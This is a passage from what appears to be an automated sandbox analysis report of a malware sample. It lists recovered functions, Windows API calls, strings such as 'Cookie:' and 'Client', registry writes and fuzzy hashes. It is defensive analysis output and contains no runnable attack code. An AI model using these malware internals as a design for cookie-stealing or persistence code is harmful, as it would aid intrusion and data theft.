RegCloseKey.ADVAPI32(?), ref: 049F7BB7

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 049F7B88

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: QueryValue$AllocateCloseHeapOpen
String ID:
API String ID: 453107315-0
Opcode ID: 51c78a1f7d158b26688f83a58238a3b9c16446edfa86270449da9120385d5e9d
Instruction ID: 3b678e29d3978a5d7bbeb3382242ce6945b32f1df5f310583832eb5735096e14
Opcode Fuzzy Hash: 51c78a1f7d158b26688f83a58238a3b9c16446edfa86270449da9120385d5e9d
Instruction Fuzzy Hash: E221C77591010CFFDF119F98DD84DEE7BBEEB49311F2084A6E901A7110E371AA51DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A01418, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,?,?,?,?,?,?,049F108A,?,0000002C,?), ref: 04A0143E
StrTrimA.SHLWAPI(00000000,04A13528,00000000,?,?,?,?,049F108A,?,0000002C,?), ref: 04A0145D
StrChrA.SHLWAPI(00000000,?,?,?,?,?,049F108A,?,0000002C,?), ref: 04A0146E
StrTrimA.SHLWAPI(00000001,04A13528,?,?,?,?,049F108A,?,0000002C,?), ref: 04A01480

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 3a475a3fec076633e31e75a07c2fbb38454991f0f224bedbfe854cb86dbc7267
Instruction ID: ec356d9753d9b8970f2c66b2be17ee047168adf5e35940fd683f33e7d00e8ba0
Opcode Fuzzy Hash: 3a475a3fec076633e31e75a07c2fbb38454991f0f224bedbfe854cb86dbc7267
Instruction Fuzzy Hash: FD118FB5200245BFDB018F59D890EEE7BB8EB897A5F51C009FC059B250D676EA418B60

Uniqueness

Uniqueness Score: -1.00%

Function 04A0F070, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A01B88,00000000,?,?,049F331A,00000000,05A98D60), ref: 04A0F07B
RtlAllocateHeap.NTDLL(00000000,?), ref: 04A0F093
memcpy.NTDLL(00000000,?,-00000008,?,?,?,04A01B88,00000000,?,?,049F331A,00000000,05A98D60), ref: 04A0F0D7
memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 04A0F0F8

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: bbb395129000bf2c982e769487bdd273ec537d559407270d8fd1d3c0eabbcd63
Instruction ID: 695fdfb4ae1a915030c2c698bd1a6515ab4cd1bd6f946b709e30e9d9765a1f7a
Opcode Fuzzy Hash: bbb395129000bf2c982e769487bdd273ec537d559407270d8fd1d3c0eabbcd63
Instruction Fuzzy Hash: 6611C672A00214AFE7118FA9EC84DAA7BAEDBD4360B054176F505D7290EAB4AE0587A0

Uniqueness

Uniqueness Score: -1.00%

Function 049FC659, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 049F1E33: RtlAllocateHeap.NTDLL(00000000,?), ref: 049F1E62
Part of subcall function 049F1E33: HeapFree.KERNEL32(00000000,00000000), ref: 049F1E85

HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,049F7448,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 049FC693

Part of subcall function 04A0BBF8: lstrlen.KERNEL32(04A08975,-00000008,-00000008,?,?,?,?,04A08975,-00000008,?,?,-00000008,?,04A05B29,Transfer-Encoding:, chunked), ref: 04A0BC0F
Part of subcall function 04A0BBF8: lstrlen.KERNEL32(-00000008,?,?,?,04A08975,-00000008,?,?,-00000008,?,04A05B29,Transfer-Encoding:, chunked), ref: 04A0BC17
Part of subcall function 04A0BBF8: lstrlen.KERNEL32(?,?,?,?,04A08975), ref: 04A0BC82
Part of subcall function 04A0BBF8: RtlAllocateHeap.NTDLL(00000000,?), ref: 04A0BCAD
Part of subcall function 04A0BBF8: memcpy.NTDLL(00000000,00000002,-00000106,?,?,?,04A08975), ref: 04A0BCBE
Part of subcall function 04A0BBF8: memcpy.NTDLL(00000000,04A08975,04A08975,?,?,?,?,?,?,04A08975), ref: 04A0BCD4
Part of subcall function 04A0BBF8: memcpy.NTDLL(00000000,?,?,00000000,04A08975,04A08975,?,?,?,?,?,?,04A08975), ref: 04A0BCE6
Part of subcall function 04A0BBF8: memcpy.NTDLL(00000000,04A133F4,00000002,00000000,?,?,00000000,04A08975,04A08975,?,?,?,?,?,?,04A08975), ref: 04A0BCF9
Part of subcall function 04A0BBF8: memcpy.NTDLL(00000000,?,00000002,?,?,?,?,?,?,04A08975), ref: 04A0BD0E

HeapFree.KERNEL32(00000000,00000000,049F7448,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 049FC6DF

Strings

Cookie: , xrefs: 049FC67B
https://, xrefs: 049FC6A2

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$Freelstrlen$Allocate
String ID: Cookie: $https://
API String ID: 2465664858-1563071917
Opcode ID: c320bae29d6a5c85721b50d43a59b70ccc97dd71cc161ef199fce291ddbc5c6b
Instruction ID: e9bb355840731483ef831780672477d3d2e805aa76dfc252d8a25600dada3ebf
Opcode Fuzzy Hash: c320bae29d6a5c85721b50d43a59b70ccc97dd71cc161ef199fce291ddbc5c6b
Instruction Fuzzy Hash: FA018E3214021ABBDB225F29DC48EAE7B6DEB85760F05C125FD08AA150CA35F9118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 049F7F74, Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON

Download Yara Rule

APIs

GlobalFix.KERNEL32(00000000), ref: 049F7FB4
memset.NTDLL ref: 049F7FC8
GetWindowThreadProcessId.USER32(00000000,?), ref: 049F7FD5

Part of subcall function 04A02BC7: OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,00000000,00000000,?,?,?,049F58D4,?,?,?,00000000), ref: 04A02C1E
Part of subcall function 04A02BC7: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,00000000,00000000,?,?,?,049F58D4,?), ref: 04A02C3C
Part of subcall function 04A02BC7: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04A02CA4

GlobalUnWire.KERNEL32(00000000), ref: 049F8000

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
String ID:
API String ID: 3286078456-0
Opcode ID: 31c338688009fb9f41b35177842be18b94ee5cc841dc3a5a764ce7650dab27a8
Instruction ID: 5788a2ec3b39dc1e08b13a08d6d507f1d17f4be135c45e108c441c8b49b8babb
Opcode Fuzzy Hash: 31c338688009fb9f41b35177842be18b94ee5cc841dc3a5a764ce7650dab27a8
Instruction Fuzzy Hash: CB115671A00605ABEB11AFA4AD49BDEBBBCEF58711F044026FD05F2290DB79D9018B61

Uniqueness

Uniqueness Score: -1.00%

Function 04A0052D, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 04A0053A
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 04A00560
lstrcpy.KERNEL32(00000014,?), ref: 04A00585
memcpy.NTDLL(?,?,?), ref: 04A00592

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: 75965a8be8aa709f0fc284310ac3071dacd95fdcb0961ff9c210d5f53b7c54c5
Instruction ID: de03a40c682960bf347c79757720cd40757e789057dd8b5a207d8351581c6e36
Opcode Fuzzy Hash: 75965a8be8aa709f0fc284310ac3071dacd95fdcb0961ff9c210d5f53b7c54c5
Instruction Fuzzy Hash: CC117971900309EFDB21CF58E844A9ABBF8FB48704F00C46AF88987220C375E905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04A10D0B, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 54stringCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(?,Blocked), ref: 04A10D27
lstrcmpi.KERNEL32(?,Main), ref: 04A10D5C

Strings

Blocked, xrefs: 04A10D21
Main, xrefs: 04A10D56

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrcmpi
String ID: Blocked$Main
API String ID: 1586166983-1966386946
Opcode ID: d199c7aad589a21251962f03e1e373f3060de693ca340e8e19f21ef31ceee2f5
Instruction ID: 570ba1c4efb483f663ffcd7a0cf21cf2097b9d7752ecb5bd1b64f6aebab5c7c9
Opcode Fuzzy Hash: d199c7aad589a21251962f03e1e373f3060de693ca340e8e19f21ef31ceee2f5
Instruction Fuzzy Hash: 780148B1204249ABAB00EF65EC80DBB3B6DFB85754B00851AFD1093621DB34F8229BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A0D14C, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04A0D15F
lstrlen.KERNEL32(05A98BC0), ref: 04A0D180
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 04A0D198
lstrcpy.KERNEL32(00000000,05A98BC0), ref: 04A0D1AA

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: c0a90b7155469f1baa2466a5532033f122108b3fb88803f394db05e19feadf96
Instruction ID: 305cabd60cf0f9ac441bccc169f4dd19a9c91a3e5c55440ee99c8c7049698b5a
Opcode Fuzzy Hash: c0a90b7155469f1baa2466a5532033f122108b3fb88803f394db05e19feadf96
Instruction Fuzzy Hash: 96018876900344BFEB11DFE8B844A5EBBFCEB59311F044565ED49D3241DA74AA05C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04A00D48, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,750DD3B0,00000000,?,04A0013C,00000000,Keys,?,?,74B5F710,00000000,00000000), ref: 04A00D4F
RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 04A00D67
memcpy.NTDLL(0000000C,?,00000001), ref: 04A00D7D

Part of subcall function 04A01418: StrChrA.SHLWAPI(00000000,?,?,?,?,?,?,049F108A,?,0000002C,?), ref: 04A0143E
Part of subcall function 04A01418: StrTrimA.SHLWAPI(00000000,04A13528,00000000,?,?,?,?,049F108A,?,0000002C,?), ref: 04A0145D
Part of subcall function 04A01418: StrChrA.SHLWAPI(00000000,?,?,?,?,?,049F108A,?,0000002C,?), ref: 04A0146E
Part of subcall function 04A01418: StrTrimA.SHLWAPI(00000001,04A13528,?,?,?,?,049F108A,?,0000002C,?), ref: 04A01480

HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 04A00DAF

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrlenmemcpy
String ID:
API String ID: 1635803283-0
Opcode ID: 9be724690eddd9dcc43e2ee29dfbb209489a0157e165c04b75e64b662f3b68d3
Instruction ID: c795fe5b2c53938721b4dd99da9e8763844dd2656d675d6d59b842a98cbca19a
Opcode Fuzzy Hash: 9be724690eddd9dcc43e2ee29dfbb209489a0157e165c04b75e64b662f3b68d3
Instruction Fuzzy Hash: 62018F36244712EBF7224E51BC44FAB7BA9EB90B51F008025FA89960E0D765BC469770

Uniqueness

Uniqueness Score: -1.00%

Function 04A014B0, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(04A173A8), ref: 04A014BB
Sleep.KERNEL32(0000000A,?,?,049FDFAA,00000000,?,04A170E8), ref: 04A014C5
SetEvent.KERNEL32(?,?,049FDFAA,00000000,?,04A170E8), ref: 04A0151C
RtlLeaveCriticalSection.NTDLL(04A173A8), ref: 04A0153B

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: 246a9f7ddece9ab8e9ed7ab8f97cfa4328084f21ce65fd8a1793de4a900f995c
Instruction ID: d9070f8f986a16d245f01c5921b1dce7f785a4c532cd70aea23e10389fcc2e6c
Opcode Fuzzy Hash: 246a9f7ddece9ab8e9ed7ab8f97cfa4328084f21ce65fd8a1793de4a900f995c
Instruction Fuzzy Hash: 59011675644304FBFB109F61AC45F9A3AA8EB24755F009021F70ADB1E0D779EE42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A0D045, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

RtlInitializeCriticalSection.NTDLL(04A17380), ref: 04A0D069
RtlInitializeCriticalSection.NTDLL(04A17360), ref: 04A0D07F
GetVersion.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04A03698), ref: 04A0D090
GetModuleHandleA.KERNEL32(04A1801D,?,00000000), ref: 04A0D0BD

Part of subcall function 04A10A09: GetModuleHandleA.KERNEL32(NTDLL.DLL,00000008,77E49EB0,00000000,?,?,?,00000000,04A0D0A7,?,00000000), ref: 04A10A1A
Part of subcall function 04A10A09: LoadLibraryA.KERNEL32(NTDSAPI.DLL), ref: 04A10AB4
Part of subcall function 04A10A09: FreeLibrary.KERNEL32(00000000), ref: 04A10ABF

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
String ID:
API String ID: 1711133254-0
Opcode ID: 2d5eee91f5dbb658c3cfa4f4a5ad33ddce5d6d0977abd3fcea37e7e0d71f8604
Instruction ID: 55b92e2d086431228e5de50b5c506acb24f8b785c003752d68def684e6b52941
Opcode Fuzzy Hash: 2d5eee91f5dbb658c3cfa4f4a5ad33ddce5d6d0977abd3fcea37e7e0d71f8604
Instruction Fuzzy Hash: B901807AA81310CFF7109FE9B844A867BE5F7A4310701647AE91ADB270D6786C438B40

Uniqueness

Uniqueness Score: -1.00%

Function 04A07F92, Relevance: 6.0, APIs: 4, Instructions: 46fileCOMMON

Download Yara Rule

APIs

Part of subcall function 04A05751: lstrlen.KERNEL32(00000000,00000000,00000000,04A03461,00002334,?,?,?,?,049F714A,?), ref: 04A05756
Part of subcall function 04A05751: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04A0576B
Part of subcall function 04A05751: wsprintfA.USER32 ref: 04A05780
Part of subcall function 04A05751: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,000000FF), ref: 04A0579E

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 04A07FBF
GetFileSize.KERNEL32(00000000,00000000), ref: 04A07FCE
CloseHandle.KERNEL32(00000000), ref: 04A07FD8
GetLastError.KERNEL32 ref: 04A07FE0

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: 6a360ba7a60ac947a73c13375948bc1a8735c323ca6acc1f00bdb360fc3e32c5
Instruction ID: 6ab62dce78e9be783aa066835ee11b3050f6dbecca78118d4839ea1cd6a072e1
Opcode Fuzzy Hash: 6a360ba7a60ac947a73c13375948bc1a8735c323ca6acc1f00bdb360fc3e32c5
Instruction Fuzzy Hash: 66F0A471601214BBFB216F69EC88F9FBE6DEF557A0F10C126FA05910D0CA74A601C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 049FF5FD, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 049FF60F

Part of subcall function 049F2815: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,04A0EA24), ref: 049F2855
Part of subcall function 049F2815: GetLastError.KERNEL32 ref: 049F285F
Part of subcall function 049F2815: WaitForSingleObject.KERNEL32(000000C8), ref: 049F2884
Part of subcall function 049F2815: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 049F28A7
Part of subcall function 049F2815: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 049F28CF
Part of subcall function 049F2815: WriteFile.KERNEL32(00000006,00001388,?,?,00000000), ref: 049F28E4
Part of subcall function 049F2815: SetEndOfFile.KERNEL32(00000006), ref: 049F28F1
Part of subcall function 049F2815: CloseHandle.KERNEL32(00000006), ref: 049F2909

WaitForSingleObject.KERNEL32(00002710,00000000,00001000,00000000,00000005,?,04A02299,.dll,00000000,00001000,00000000,00000000,049F11C6,?,049F11C6), ref: 049FF632
CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,04A02299,.dll,00000000,00001000,00000000,00000000,049F11C6), ref: 049FF654
GetLastError.KERNEL32(?,04A02299,.dll,00000000,00001000,00000000,00000000,049F11C6,?,049F11C6), ref: 049FF668

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
String ID:
API String ID: 3370347312-0
Opcode ID: 17432cc19ae8965026defe34da357e421cf514619c21248024c29433b060b7c2
Instruction ID: c2158ffcf06555eebf8a303cfadb3575340f5029d441ed0086635ccb85110fef
Opcode Fuzzy Hash: 17432cc19ae8965026defe34da357e421cf514619c21248024c29433b060b7c2
Instruction Fuzzy Hash: CFF0C831241208BBFF114F609C09F5E3B29EF19714F104424FB11D81F0DF75A9629B69

Uniqueness

Uniqueness Score: -1.00%

Function 049F24E9, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 049F24F7
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,049FCDC0,00000000,00000000), ref: 049F250C
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 049F2519
CloseHandle.KERNEL32(?), ref: 049F252B

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 957d3dada8e6f0f45388936677be73665c4b8d05d9ec89921caf119d06a6ff1f
Instruction ID: c0e8a356c8f44b42d1149802a0b688e806250a06f59674f00bf26d6cbb708f37
Opcode Fuzzy Hash: 957d3dada8e6f0f45388936677be73665c4b8d05d9ec89921caf119d06a6ff1f
Instruction Fuzzy Hash: BBF05EB11043087FEB106F66ECC4C2BFBEDEB92298B12897EF64292151D676BC054B60

Uniqueness

Uniqueness Score: -1.00%

Function 049FECB9, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0CFA6: RegQueryValueExA.KERNELBASE(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,00000003,00000000,?,00000000,?,04A0E66E,04A0E66E,?,04A088E0,00000000), ref: 04A0CFDE
Part of subcall function 04A0CFA6: RtlAllocateHeap.NTDLL(00000000,04A088E0), ref: 04A0CFF2
Part of subcall function 04A0CFA6: RegQueryValueExA.ADVAPI32(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A0D00C
Part of subcall function 04A0CFA6: RegCloseKey.KERNELBASE(?,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?,?,?,00000000,?,?,?), ref: 04A0D036

memcpy.NTDLL(04A16068,?,00000028,00000000,Client,?,?,?,?,?,04A0F218,?,?,?,?,049F8A8C), ref: 049FECEB
HeapFree.KERNEL32(00000000,?,Client,?,?,?,?,?,04A0F218,?,?,?,?,049F8A8C,?), ref: 049FED1C

Strings

(, xrefs: 049FECD4
Client, xrefs: 049FECC6

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: ($Client
API String ID: 1301464996-90774469
Opcode ID: bcacee91c15f7d36763e3dd78cc3c833610228e679e2b0aa407f0ce084487e23
Instruction ID: 3fd3cf3ead6a7623f39611976745d4cb22abcc0d06941677257dab446f01e827
Opcode Fuzzy Hash: bcacee91c15f7d36763e3dd78cc3c833610228e679e2b0aa407f0ce084487e23
Instruction Fuzzy Hash: D0F04FB5940304BBFF21AF80DC41F997B6CE714B54F214165EA08A61A0D6B87A89CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A0CEBA, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000012B,04A0A0BF,000000FF,05A987E8,?,?,049F2D82,0000012B,05A987E8), ref: 04A0CED6
GetLastError.KERNEL32(?,?,049F2D82,0000012B,05A987E8,?,?,?,?,04A0F9C6,00000001,?), ref: 04A0CEE1
WaitNamedPipeA.KERNEL32(00002710), ref: 04A0CF03
WaitForSingleObject.KERNEL32(00000000,?,?,049F2D82,0000012B,05A987E8,?,?,?,?,04A0F9C6,00000001,?), ref: 04A0CF11

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: f6eb55ca0a2e475d16884ce2e58dda6c96af663fcf92c3d26c47314af89b7f7c
Instruction ID: c2948730396b9a0f68e739f7d38ea01d0d46e4120a99d8b58be6d33cc237232e
Opcode Fuzzy Hash: f6eb55ca0a2e475d16884ce2e58dda6c96af663fcf92c3d26c47314af89b7f7c
Instruction Fuzzy Hash: 42F0CD36601220ABFB215BA5BC4CB56BA65EB243B2F108621F90AA71F0C2249C01C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 049F7D83, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05A98D20), ref: 049F7D8C
Sleep.KERNEL32(0000000A), ref: 049F7D96
HeapFree.KERNEL32(00000000,?), ref: 049F7DBE
RtlLeaveCriticalSection.NTDLL(05A98D20), ref: 049F7DDC

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 434dab0b555ded8e2ea62c0911ef6b54d242256a60918d0a8b7cbd74d18d51ad
Instruction ID: 98629ad34ad98155acf5549ebeb6619c2cb376670f49f5e02191ea5221ad722b
Opcode Fuzzy Hash: 434dab0b555ded8e2ea62c0911ef6b54d242256a60918d0a8b7cbd74d18d51ad
Instruction Fuzzy Hash: 30F0DA70200241ABFB109F68ED49F6A3BF9EB24744F4484A5F915D61A1D639FC41CB24

Uniqueness

Uniqueness Score: -1.00%

Function 049F6C75, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

Email, xrefs: 049F6CCB, 049F6CD8

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: Email
API String ID: 1279760036-642995056
Opcode ID: 9bfdccc5864e33c006f6fd26fd9bce0dc60d0c4917bf02acfdf7df51dc382045
Instruction ID: b1e7124ca51f264a527a33d963f4d8580a0113ac6ecd162d109b8cb8f5a266db
Opcode Fuzzy Hash: 9bfdccc5864e33c006f6fd26fd9bce0dc60d0c4917bf02acfdf7df51dc382045
Instruction Fuzzy Hash: F33129B1108305BFEB119F50DC84D6BBFAEFB98798F004929FA8590060E731ED56DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04A025B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,04A0EA2F,?,00000000,00000000,00000000,00000006,00000000), ref: 04A025D1
wsprintfA.USER32 ref: 04A025EF

Strings

%02u:%02u:%02u , xrefs: 04A025E9

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: SystemTimewsprintf
String ID: %02u:%02u:%02u
API String ID: 425189169-982595855
Opcode ID: cf3251bb69667fb60a63492b94a8e25b8c9a4b4f32439f778f8c8c2adddea9c9
Instruction ID: 245312be56b81f00833df14c124d18d6e63bebfd1c105b6ea9ea040551d31a09
Opcode Fuzzy Hash: cf3251bb69667fb60a63492b94a8e25b8c9a4b4f32439f778f8c8c2adddea9c9
Instruction Fuzzy Hash: 73216D79900204BFEB11DFD5D949EAB77BDFB88700B0044A9FA01DB255D638AE02CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A041E9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34registryCOMMON

Download Yara Rule

APIs

Part of subcall function 049F2D2F: RegCreateKeyA.ADVAPI32(80000001,05A987E8,?), ref: 049F2D44
Part of subcall function 049F2D2F: lstrlen.KERNEL32(05A987E8,00000000,00000000,00000028,?,?,?,?,04A0F9C6,00000001,?), ref: 049F2D72

RegSetValueExA.ADVAPI32(?,04A1606E,00000000,00000001,?,?,00000001,?,Client,00000028,?,?,04A0FA5B,Client,04A16068,00000028), ref: 04A0421B
RegCloseKey.ADVAPI32(?,?,?,04A0FA5B,Client,04A16068,00000028,00000003,00000001,?,?,04A1606E,?,?,?), ref: 04A04234

Strings

Client, xrefs: 04A041EE

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CloseCreateValuelstrlen
String ID: Client
API String ID: 1356686001-3236430179
Opcode ID: ba5fb39b88c219d8bcea8b13777f16218f6ad60e978af06afcd7703b265ab48b
Instruction ID: 5b8975c58d3f090e61cbd6cde66c37a313352755187706002b7868201801e0a2
Opcode Fuzzy Hash: ba5fb39b88c219d8bcea8b13777f16218f6ad60e978af06afcd7703b265ab48b
Instruction Fuzzy Hash: 9DF01D36500119FFCF129F94EE04CAE7B79FB18351B008065FA01A6164D7769E11EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A005C2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28registryCOMMON

Download Yara Rule

APIs

Part of subcall function 049F2D2F: RegCreateKeyA.ADVAPI32(80000001,05A987E8,?), ref: 049F2D44
Part of subcall function 049F2D2F: lstrlen.KERNEL32(05A987E8,00000000,00000000,00000028,?,?,?,?,04A0F9C6,00000001,?), ref: 049F2D72

RegSetValueExA.ADVAPI32(?,Client,00000000,00000003,?,00000028,00000001,?,?,00000057,?,?,049F72B1,04A16068,04A1606E,04A08063), ref: 04A005EF
RegCloseKey.ADVAPI32(?,?,00000057,?,?,049F72B1,04A16068,04A1606E,04A08063,00000000,?,?,?,?,049F1DFA,05A98D5C), ref: 04A005FA

Strings

Client, xrefs: 04A005E7

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CloseCreateValuelstrlen
String ID: Client
API String ID: 1356686001-3236430179
Opcode ID: 02253b9a192e408f49f607682d4e697500cc1fb712c2b8226da4c42adc313043
Instruction ID: 44ef6c1095a9385e5cb7dd438a91d270d1e13c0cad0a00171ad0e3133754fbd4
Opcode Fuzzy Hash: 02253b9a192e408f49f607682d4e697500cc1fb712c2b8226da4c42adc313043
Instruction Fuzzy Hash: 4FE0D136540214FFDB225B94ED05F9EB76DDB64750F104051FA00F71A0D6B5AF0197E0

Uniqueness

Uniqueness Score: -1.00%

Function 049F110B, Relevance: 5.2, APIs: 4, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 049F1169
